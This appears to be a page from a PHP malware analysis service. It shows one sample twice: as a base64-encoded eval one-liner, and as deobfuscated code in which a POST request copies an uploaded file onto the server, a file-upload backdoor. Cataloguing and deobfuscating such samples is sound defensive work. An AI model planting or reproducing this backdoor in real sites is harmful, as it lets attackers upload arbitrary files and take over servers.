PHP Malware Analysis

Back to list

Tags

Input
_POST

Deobfuscated code

<?php

echo eval /* PHPDeobfuscator eval output */ {
    if ($_POST) {
        if (@copy($_FILES["354"]["tmp_name"], $_FILES["354"]["name"])) {
            echo "Y";
        } else {
            echo "N";
        }
    } else {
        echo "";
    }
};


Original code

<?=eval("?>".base64_decode("PD9waHAgaWYoJF9QT1NUKXtpZihAY29weSgkX0ZJTEVTWyIzNTQiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyIzNTQiXVsibmFtZSJdKSl7ZWNobyJZIjt9ZWxzZXtlY2hvIk4iO319ZWxzZXtlY2hvIiI7fT8+"));?>